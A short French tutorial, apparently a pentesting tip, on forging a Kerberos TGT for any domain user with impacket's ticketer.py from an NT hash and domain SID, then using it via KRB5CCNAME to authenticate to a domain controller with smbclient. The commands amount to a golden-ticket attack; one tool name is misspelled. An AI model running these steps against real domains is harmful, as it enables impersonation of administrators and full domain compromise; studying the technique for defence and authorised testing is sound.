Exploiter Kerberos depuis Linux

Saviez vous qu'il est possible d'exploiter Kerberos depuis une machine Linux ? En effet il est possible d'utiliser des tickets Kerberos directement depuis notre hôte Linux.

Pour cela il faudra d'abord créer un ticket valide via l'outil ticketer de la suite impacket:

ticketer.py -nthash <NT hash> -domain-sid <SID du domaine> -d nom_du_domaine nom_de_l_utilisateur

Ensuite il faudra utiliser la variable d'environnement KRB5CCNAME:

export KRB5CCNAME=Administrateur.ccache

Il ne nous restera plus qu'à utiliser l'ensemble de nos tools impacket en spécifiant l'option -k:

sbmclient.py -k -no-pass -debug <domain>/<nom_de_l_utilisateur>@FQDN_du_DC

Ici j'ai créé un ticket TGT valide pour l'utilisateur Administrateur mais j'aurais pu spécifier n'importe quel utilisateur.